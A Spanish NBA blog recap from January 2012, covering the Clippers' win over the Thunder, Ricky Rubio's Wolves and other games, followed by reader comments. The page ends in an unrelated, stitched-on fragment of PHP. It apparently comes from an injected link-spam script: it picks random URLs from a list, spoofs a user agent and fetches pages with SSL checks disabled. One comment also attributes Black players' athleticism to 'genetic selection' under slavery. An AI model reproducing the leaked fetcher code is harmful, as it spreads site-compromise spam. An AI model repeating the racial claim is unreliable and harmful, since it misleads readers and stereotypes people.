La Crónica: Los Clippers enseñan la patita

31 de January de 2012 por TheDeerHunter

¡Partidazo en el Staples! Pero no eran Kobe, Pau ni los Lakers los protagonistas del mismo, sino los Clippers que se postulan como el equipo a batir de L.A. y de la división Pacífico. Los Thunder llegaban como líderes de la liga pero su actuación puede resumirse así. Bajo un clínic de dirección de Chris Paul los Clippers pasaron por encima a la defensa de Oklahoma que, por momentos, no sabían qué hacer al respecto. Sólo una actuación también monstruosa de Durant y Westbrook (cada uno por su lado) les salvó de un revolcón considerable (100-112).

También disfrutamos del mejor partido hasta la fecha de los Wolves, en el regreso de Adelman como visitante a Houston (120-108). Mucho me temo que a McHale le quedan por tomar algunos colacaos antes de igualar al viejo zorro. Magistral Ricky, rozando una vez más el triple doble, eficaz como nunca en el tiro y dirigiendo a la perfección dos martillos pilones que fueron Love y Beasley. Ojo porque uno de los potenciales all-star como es Kyle Lowry lo pasó anoche fatal ante su defensa. A los Wolves se les nota cada día más serios, especialmente fuera de casa. Acumulan un 10-11 y perfectamente podrían llevar 2 o 3 victorias más.

Además, vimos algunos interesantes choques entre escuadras de la zona noble. Los Jazz doblegaron a los Blazers en Salt Lake City, gracias a un providencial 13-0 para remontarles (89-93). En Memphis los locales no pudieron con San Antonio, en un partido bastante espeso (83-73). Tanto Marc, como Gay, Parker, Duncan, etc, estuvieron excesivamente fallones. Fue uno de esos días iluminados que tiene Bonner con su tirito de 3 lo que decidió el resultado.

Casi deja de ser noticia que Orlando no llegue a los 70 puntos. Anoche lo volvieron a hacer en Philadelphia y ya pueden dar gracias por lograr despertar del colapso en el último cuarto, porque al final del tercero estaban en proyección de menos de 60 (69-74). Sí resulta más noticioso que entre Vince Carter y Delonte firmen casi 50 puntos (122-99). Era contra los flojísimos Suns (#freeSteveNash), pero Vinsaniti parece estar recuperando sensaciones en Dallas. Sería una noticia fantástica para sus intereses.

Del resto de choques destaca la nueva victoria de los Bucks ante Detroit (82-103). Como alguien mencionaba el otro día da gusto volver a ver a Dunleavy útil para el baloncesto. Jennings también está volviendo a dar su mejor versión y su equipo lo nota rondando el 50%. Rose y los Bulls se cebaron ante los Wizards (98-88) y Miami no tuvo problemas ante Hornets (95-109).

PREMIOS

MVP: 26 puntos (12 de 16 en tiros) y 14 asistencias.  Cuando Chris Paul está sano no hay base que se le acerque. Derrick Rose está a su nivel pero es de otro estilo. Anoche liquidó a os Wizards con 35 puntos y 8 asistencias.

Rookie: Es posible que Ricky Rubio pueda mirarles a la cara  algún día. Anoche en la victoria de los Wolves se quedó a 2 rebotes del triple doble: 18 puntos, 11 asistencias y 8 rebotes.

Sorpresa: 28 minutos para Delonte West que agradece con 25 puntos (9 de 12) y 6 asistencias. Vince Carter también cuajó un buen partido para Dallas con 21 puntos. Y en los Wolves, Michael Beasley ha vuelto en plena forma, nada menos que 34 puntos para el ex de los Heat.

Decepción: 4ª derrota consecutiva de los Magic, una más con un marcador impropio de esta liga. Hedo Turkoglu no ejerció en ningún momento de point-forward y estuvo horrendo en el tiro.

Esfuerzo en vano: Esta vez Kevin Durant se encontró enfrente a un equipo plagado de clase y que aspira a lo máximo. Sus 36 puntos y 13 rebotes quedaron sin premio.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

30 comentarios a esta entrada

  1. nba dice:
    #1

    Lo de incluir a artest en el trade de Pau a bulls, es porque veo a Artest motivado como el unico en el Este que sería capaza de disminuir la producción de Lebron , en una hipotetica final de conferencia , y a Bosh claramente superado por Pau , ya que Wade y Rose se anularian mutuamente .
    Por lo que si los bulls quieren llegar a la final de la NBA ese es un trade que creo les puede interesar

      Citar

  2. HeiNeKeN dice:
    #2

    Que barbaridad lo de Blake Griffin… y en twitter muchos jugadores comentando la jugada jajaja

      Citar

  3. Alfredo dice:
    #3

    A ver si alguno de los expertos alguien me puede ilustrar… Mucho estamos hablando del traspaso de Howard pero qué otros agentes libres interesantes hay el próximo verano?? Quizá estamos haciendo muchas cábalas a corto plazo (trade deadline) pero los equipos estén pensando a largo plazo…

      Citar

  4. Ru dice:
    #4

    El partidazo de Clippers fue una burrada sinceramente,entre el sobremotivado DeAndre Jordan,la racha de triples y Blake Griffin,ha sido la bomba.Oklahoma no los ha visto venir en muchos momentos y aún así han intentado darle la vuelta y daban la sensación de que un poquito más y lo hacían,sin haber estado verdaderamente en ningún momento cerca.Si nada se tuerce esta es la final de conferencia y por mayor variedad de recursos y siendo lo especial que es esta campaña,Clippers parten un pelín por encima de Oklahoma.El traspaso de CP3 fue un acierto mayúsculo.

    Mo Williams consolidado en el equipo,es la anotación exterior desde el banco.Urgiría que movieran a Bledose más otro jugador para un recambio interior de garantías porque no creo que tenga minutos para lucirse y ganar mercado,siempre y cuando lo de Kenyon Martin sea más habladuría que otra cosa.

      Citar

  5. Rompe dice:
    #5

    Yo a los Thunder no los acabo de ver porque son el mismo tipo de equipo que Miami, tres jugadores que anotan y el resto a verlas venir… Y con sólo tres patas, de menor calidad que los Heat, como uno de ellos no esté fino…

      Citar

  6. melo15 dice:
    #6

    Pues no se si ahora mismo esta Pau para comerse a Bosh que esta haciendo unos partidazos tremendos.

      Citar

  7. simon dice:
    #7

    ahi llevas razón melo, yo tampoco estoy seguro de que Gasol se coma a Bosh. Este año Bosh está impresionante.

      Citar

  8. Esteban dice:
    #8

    Clippers sensancion, sin dudas estraran en el puesto 2 del oeste y ademas casib seguro que jugaran final de conferencia

      Citar

  9. jose antonio ramirez dice:
    #9

    Lo de clippers-oklahoma sera porque no se dijo con tiempo. Totalmente de acuerdo con los que opinan que esta por encima clippers, si, se que es un partido, por eso estoy deseando que se enfrenten en play offs, donde se veran aun mas la dependencia de los 2 cracks, y la experiencia de billups, que el solo tiene mas que oklahoma entera. El mate de griifin es como decirlo… algunos opinaban que a grififin se le seca, mas bien que ibaka-perkins podrian secarlo, no lo dije en su momento pero despues de esto.. a griffin señores no lo para ni su madre. Y menos estos 2. Por ahora perkins tiene la foto principal del album de su vida. Ibaka a su lado a lo unico que aspira es que no le pase lo mismo. El mate es tan tremendo que posiblemente sea el mate mas impactante que veamos nunca, y siempre sera recordado. De acuerdo con RU en que a un nivel como esta jugando willliams, no hace ni falta un escolta, con un pivot medio anotador bastaria. De todas maneras, ya lo dije y pienso, este no es su año aun creo. Lo que si me apuesto dinero es que el que lo elimine en play offs no sera oklaoma. gracias

      Citar

  10. Esteban dice:
    #10

    jose antonio ramirez:
    Lo de clippers-oklahoma sera porque no se dijo con tiempo. Totalmente de acuerdo con los que opinan que esta por encima clippers, si, se que es un partido, por eso estoy deseando que se enfrenten en play offs, donde se veran aun mas la dependencia de los 2 cracks, y la experiencia de billups, que el solo tiene mas que oklahoma entera.El mate de griifin es como decirlo… algunos opinaban que a grififin se le seca, mas bien que ibaka-perkins podrian secarlo, no lo dije en su momento pero despues de esto.. a griffin señores no lo para ni su madre. Y menos estos 2. Por ahora perkins tiene la foto principal del album de su vida. Ibaka a su lado a lo unico que aspira es que no le pase lo mismo. El mate es tan tremendo que posiblemente sea el mate mas impactante que veamos nunca, y siempre sera recordado. De acuerdo con RU en que a un nivel como esta jugando willliams, no hace ni falta un escolta, con un pivot medio anotador bastaria. De todas maneras, ya lo dije y pienso, este no es su año aun creo. Lo que si me apuesto dinero es que el que lo elimine en play offs no sera oklaoma. gracias

    el partido de griffin no fue gran cosa ayer, anoto si, pero vamos es obvio es el ala pivote titular del all star del oeste, pero lo vi intimidado frente a ibaka, en aquellos momento donde no podia volcarla, le vi dar pasos para esquivarlo y tambien hacer giro y contra giro para terminar tirandk y no pegarle al aro, errores que un all star no deeria tener

    el thunder necesita ya un interno quen pueda anotasr, tiene todos defensores!!!les vendria como anillo al dedo como recmbio interior un jamison, ya que ibaka, collison, perkins y mohamed pueden jugar de centro y complementarse con jamison, la dependencia por sus dos grandes y medio en estos partidos cada vez es mas aterradora… a no dormirse ciudad del trueno y a moverse!!

      Citar

  11. Sancho88 dice:
    #11

    Bueno, el mate de Blake Griffin. Yo también opino como jose antonio, que es el mate más impresionante que se ha visto en la historia, yo diría que incluso por encima de Vince Carter sobre Fred Weis.

    http://estrellasdelasalturas.blogspot.com/2011/07/genetica-y-mestizaje.html

    Comparto un enlace de mi blog que me curré en verano. Yo cada día flipo más con Griffin, y me gustaría aprovechar para comentar algo. Lo que hoy estamos viendo en la NBA, a pesar de que sea vomitivo decirlo, jamás habría ocurrido de no ser por el mercado triangular de las Indias, es decir, el esclavismo. En las costas del oeste de Ecuador hay señores de más de dos metros, mientras en las montañas miden metro y medio. Lo mismo sucede en Brasil, Jamaica, Panamá, etc. Y los afroamericanos de Estados Unidos, que nos están brindando estas burradas, llegaron allí, al sur, a los estados confederados, desde Mali, Togo, Benin, etc. La mezcla es la clave de la evolución, lástima que estamos asistiendo a este espectáculo por culpa de una selección genética de los mejores esclavos africanos; que hoy en día, siguen siendo esclavos, en mi opinión, pues aunque a cambio de un buen puñado de dólares, esta gente no llega jamás sana a los 35-40 años (excepto Mutombo, que morirá a los 800 años), debido a que les exprimen. Bueno, es una opinión larga, lo más importante, si os interesa el tema, es que paséis de todas las gilipoyeces que digo, y os veáis el documental que he colgado abajo del enlace, el de Eva Genética. Todos procedemos del cuerno de África, hermanos. xd

      Citar

  12. Esteban dice:
    #12

    A q va tu comentario sancho? Digo, si los jugadores de la nba se sienten exclavisados, pues pueden retirarsew y trabajar en un mc donalds…

    Vamos gente no subestimemos el valor del dinero, te doy un ejemplo, andres nocioni prefiere ser un esclavo de la nba q una capataz fuera de alli, la razon? Los 8 millones q cobra este año, una cifra 8 veces mayor de lo q cobraria fuera de alli, prefiere ser ninguneado con 2 o 3 min basura y hacerse rico q dosafrutar de lo que sabe hacer…

    Por la plata baila el mono, le guste a quien le guste, y al que no le guste q renuncia… Solo q nadie renuncia

      Citar

  13. Esteban dice:
    #13

    Hay q buscar alguna forma triangular para q kaman termine en los mavs, estos necesitan un pivot de esa calidad que ademas es un expiring, y a la vez mandar a odom a los clippers, q es un fracaso rotundo en dallas y seria la clave para que los clips salten al titulo

    Q pueden mandar los clips a NO? Bledsone, un base que necesitan alli, su seleccion de primera ronda y si es posiblee a gomes

    TODOS SALEN GANANDO!!!!

      Citar

  14. simon dice:
    #14

    Esteban: Hay q buscar alguna forma triangular para q kaman termine en los mavs, estos necesitan un pivot de esa calidad que ademas es un expiring, y a la vez mandar a odom a los clippers, q es un fracaso rotundo en dallas y seria la clave para que los clips salten al titulo

    Q pueden mandar los clips a NO? Bledsone, un base que necesitan alli, su seleccion de primera ronda y si es posiblee a gomes

    TODOS SALEN GANANDO!!!!

    Mira que eres una mente perversa… si tras el veto de Stern al traspaso de Paul a Lakers, Odom acaba en Clippers ( encima a cambio de nada ) … sería ya el colmo.

      Citar

  15. Esteban dice:
    #15

    Bueno simon, no es mente perversa, lo de odom fue un fiasco en dallas y los clippers con odom, serian uno de los 4 equipos mas poderosos de la liga

    Por otro lado, hablando del veto, como se equivocan los equipos cuando buscan futuro… Como aminu y selecciones q supuestamewnte serian altas

    Q equipo serian los hornets, con martin, una dupla interior scola y okafor y odom de sexto hombre, sin dudas estareian peleando por PO, en vez de eso, q?

    Kaman, no creo q muchos equipos de la zona baja den selecciones por el, q no los llevara a ningun lado, quiza algun joven y excepcion, mas q eso no
    Aminu, un fiasco total, pesimo
    Gordon, q fin de curso los pacers o boston pondran un pastizal por el y hay q ver si los dueños de la NBA estan dispuestos a igular, lo dudo
    Y la seleccion de minesota, q creo q estara en el puesto 12 o 13 mas alto no

    En fin, nunca es aconsejable una reeconstruccion, debe ser el ultisimo recurso

      Citar

  16. HeiNeKeN dice:
    #16

    Odom tiene una clausula por la que no puede ser traspasado junto con otro jugador de Dallas (al menos eso pone en la ESPN Trade Machine cuando intentas traspasarlo) por lo que en un negocio a 3 bandas, Dallas solo podría meter a Odom y por tanto es imposible hacer este traspaso ya que Kaman cobra 5 kilos más que Odom.

    Tendrían que hacerlo por partes supongo

      Citar

  17. Esteban dice:
    #17

    Heine! No tenia esa informacion de odom, y por demas creia q odom cobraba casi 9 mill y kaman 10

      Citar

  18. Sancho88 dice:
    #18

    Esteban, para mí el esclavismo es algo social. Igual que en el pasado el capital echó mano de ellos en las plantaciones (no llames tú esclavismo al trabajo de oficina), ahora hace lo mismo. Si te parece sano trabajar todos los días a costa de llegar a los 40 años medio cojo, ya me dirás. Creo que se les está explotando a niveles muy crueles, y la mayoría son negros, por eso tomo ese ejemplo. Y lo de la pasta es relativo, porque si me dijeras que alguien no se está forrando a costa de ellos… Sobre Nocioni prefiero no opinar, ese tipo de jugadores se aprovechan de un marco laboral que favorece a todos los jugadores. La cláusula de amnistía debería ampliarse a gente como él. Fue muy bueno en Vitoria, casi uno de los mejores jugadores de la liga. Ahora es un caradura que se está forrando sin hacer nada

      Citar

  19. Esteban dice:
    #19

    Sancho88:
    Esteban, para mí el esclavismo es algo social. Igual que en el pasado el capital echó mano de ellos en las plantaciones (no llames tú esclavismo al trabajo de oficina), ahora hace lo mismo. Si te parece sano trabajar todos los días a costa de llegar a los 40 años medio cojo, ya me dirás. Creo que se les está explotando a niveles muy crueles, y la mayoría son negros, por eso tomo ese ejemplo. Y lo de la pasta es relativo, porque si me dijeras que alguien no se está forrando a costa de ellos… Sobre Nocioni prefiero no opinar, ese tipo de jugadores se aprovechan de un marco laboral que favorece a todos los jugadores. La cláusula de amnistía debería ampliarse a gente como él. Fue muy bueno en Vitoria, casi uno de los mejores jugadores de la liga. Ahora es un caradura que se está forrando sin hacer nada

    nocioni, solo es un ejemplo, eddy curry, dampaier y unos cuantos notables mas, se han aprovechado del convenio de modo escandaloso, como el propio lewis, deberia haber niveles de rendimiento para poder cortarlos, tanto por tantos minutos jugadores y con ciertos porcentajes, no se digo, se me ocurre pero casos asi abundan
    en cuanto a la explotacion, ls nba no es el unico lugar donde se hace, y por lo menos alli pagan millones, viajan en primera y duermen en hoteles 5 estrellas, creo que hay trabajos miles de veces peores que jugar en la nba, a eso me refiero, y creo que sus jugadores prefieren llegar cojos a los 40 pero por lo menos ser ricos, s llegar caminando bien, pero con el cerebro atrofiado por trabajo de oficina y pobres a los 40…

      Citar

  20. Sancho88 dice:
    #20

    Además, donde esta la NBA y ese supuesto buen trato que da a sus jugadores? Donde estaban el año pasado, y hace cinco, cuando Manute Bol se estaba muriendo en su casa de Sudán? No fue un icono allí? No son ellos tan protectores con sus jugadores?Pues bien, nadie hizo nada por este tipo, que tiene una vida muy jodida y murió como un perro. Además, les están sacando prácticamente de los institutos para reventarles hasta que les aguante el cuerpo, sin darles ninguna oportunidad de formarse. A no ser que seas de Duke o algo por el estilo, un añito de freshman y ale, hata que revientes. Y si juegas mal, despídete. Yo digo que es una liga muy muy exigente, sin ningún tipo de remordimientos y que en general, no está formando personas, sino destrozando físicamente a los jugadores, eso sí, a cambio de mucha pasta. Pero si para ti el esclavismo es solo si te pagan o no, es respetable. Yo digo que al deportista de élite, por lo general, se le explota al máximo para que otros saquen rendimiento de él. Bueno, me parece peor lo que pasa en los rings de boxeo, pero en la NBA también te puedes cruzar con un Kermith Johnson de la vida y que te la arruinea. Y eso viene provocado precisamente porque no se preocupan por la formación de los jugadores, ni les educan. Yo creo que se debería prohibir entrar antes de los 20 años allí. Sé que cambiaron la norma, pero no sé donde está ahora el techo. No es lo mismo jugarte 82 partidos en 4 meses, que jugar 34 en Europa en 9…

      Citar

  21. Sancho88 dice:
    #21

      Citar

  22. Esteban dice:
    #22

    ok sancho, si un jugador que gano 100 millones durante su carrera llega pobre a los 40, pues no es la culpa de quien le paga sino de quien despilfarra el dinero

    bol es un caso muy especial, con una fuerte enfermedad y gasto su dinero ayudnado a su pais tengo entendido

    el reso lo gasta en drogas, alcohol, prostitutas y superfiestas, me parece bien, pero no pueden quejarse si estan en bancarrota

      Citar

  23. Sancho88 dice:
    #23

    Si, pero a eso te voy. Indirectamente, tu estas colaborando en que estos chicos no sepan gestionar su patrimonio, se jueguen el dinero en los casinos, como Walker, que más tarde tuvo que vender su anillo de campeón, etc. Porque no les estás dando la oportunidad de formarse como personas, ya que la NBA es totalmente incompatible con el estudio. Y claro, si tú a un chico de 20 años le pones 10 millones al año en las manos, pasa de formarse, y se piensa que vivirá siempre rodeado de gente famosa, amigos, etc. Pero esa no es la realidad. La realidad es que después de una carrera mas o menos exitosa, la mayoría no encuentran su sitio en la vida. Algunos se colocan en puestos en franquicias, pero no hay sitio para todos. A mí es una situación que me da mucha pena, y no dejo de decir que son privilegiados, pero que hay que valorar la situación en global, a la persona en sí, y no me aprece positivo el trato que les dan como personas.

      Citar

  24. Sancho88 dice:
    #24

    Y ahora no hay muchas movidas con los jugadores, pero la última fue la de Arenas, y tema de droga, movidas con los coches, fichas policiales, temas de armas ilegales… sobre todo en los 90 y comienzos de los 2000… día sí día también

      Citar

  25. Esteban dice:
    #25

    Sancho88:
    Y ahora no hay muchas movidas con los jugadores, pero la última fue la de Arenas, y tema de droga, movidas con los coches, fichas policiales, temas de armas ilegales… sobre todo en los 90 y comienzos de los 2000… día sí día también

    si, si vamos a la formacion de personas es algo obvio, pero no pasa solo con la NBA, por el contrario, ahora los obligan a jugar un año en la universidad, y terminar sus estudios secundario para ser elegibles, yo soy de argentina, un pais formador de juveniles futbolistas, pues te cuento q aqui los jovenes dejan el colegio antes de terminar la secundaria para ser parte de planteles profesionales de futbol, casi ninguno termina la secundaria y los representantes les hacen contratos a los 13 años para asegurarse su futuro, en fin, la NBA, no es perfecta, pero q si lo es?

      Citar

  26. HeiNeKeN dice:
    #26

    Esteban:
    Heine! No tenia esa informacion de odom, y por demas creia q odom cobraba casi 9 mill y kaman 10

    Yo también lo creia pero se ve que cobra 14 kilos Kaman…

    Aqui tienes la pagina de la ESPN para hacer traspasos (y ver si son viables o no)

    http://espn.go.com/nba/tradeMachine

      Citar

  27. Sancho88 dice:
    #27

    Ya Esteban, pero estaría bien que se tendiera a la formación en todos los países. Habiendo medios… por eso te digo que es un poco vergonzoso como les exprimen. El ejemplo de Argentina ya es brutal, lógicamente, aunque allí supongo que muchos niños están pasando hambre y solo por intentar llevar un plato de habas a casa hacen lo que sea. Es que si no es así, al final el deporte acaba convirtiéndose en puro exhibicionismo físico, y los jugadores no pueden hablar en la prensa porque la van a cagar, ya que les engañarán periodistas sin escrúpulos para que digan lo que no tienen que decir. A mí me da pena que pase esto, porque el ejemplo que se da es bastante bastardo…

      Citar

  28. Denise dice:
    #28

    Estoy viendo el box-score de Lakers y veo que han jugado 13 jugadores…¿no eran 12 los jugadores como maximo que se permitía que jugaran?

      Citar

  29. GreenPride dice:
    #29

    Vi el Clippers-Thunder y la verdad es que impresionantes los Clippers. Partidazo tremendo de muchos de sus jugadores sobre todo de Paul y Butler. Los tiradores frieron a los de Oklahoma (Mo, Billups y Butler bombardeando) y cuando no pues entre CP3 y los dos interiores se forraron en los pick&roll. Juego muy compensado y una muy buena defensa como la de Oklahoma nunca supo cómo pararles. Aún con esto, los Thunder dieron la cara agarrados a sus dos estrellas (¿por qué eres tan bueno Durantula?) y si llegan a tener un partido decente de Harden a lo mejor hubieran estado más cerca. No nos podemos guiar por este partido porque a los Clippers les salió todo pero sin duda son de los equipos que mejor está jugando en el Oeste, al menos a ratos y son candidatos a todo. Si empaquetaran a Bledsoe por un interior de garantías para mí favoritos nº1 a las finales en el Oeste
    A los Thunder les falta un anotador interior, cierto, pero ¿quién tiene un pivot que domine los movimentos al poste hoy día? Prácticamente nadie y para uno que lo tiene no lo aprovecha (Lakers).
    Para mí, tras estos dos en el Oeste estará Dallas. Equipo experimentado, muchos jugadores importantes, con experiencia y que pueden anotar fácil. Si consiguen defender en condiciones creo que disputarán la conferencia con Clippers y Thunder. En cuanto a Odom, démosle tiempo. Llegó fuera de forma y cabreado a Dallas pero es un jugadorazo y con el paso de los meses sacará lo mejor. Si además les funcionan Vince y Delonte pues serán un equipo temible.
    Del mate de Griffin no puedo decir nada porque no me salen las palabras para describir semejante animalada.
    En cuanto a los Wolves, para mí apuntan a playoffs si Beasly consigue una regularidad en su rendimiento. Partidazo de Ricky que podría aspirar a ROY tal como está jugando.

      Citar

  30. melo15 dice:
    #30

    Nose Sancho es verdad, que estos jugadores se les exige mucho pero cobran mucho tambien
    Y otra cosa Sancho, la otra alternativa de vida que les queda, son las drogas, los tiroteos y una vida de miseria, a muchos el baloncesto les salva la vida, asi que no pueden quejarse

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>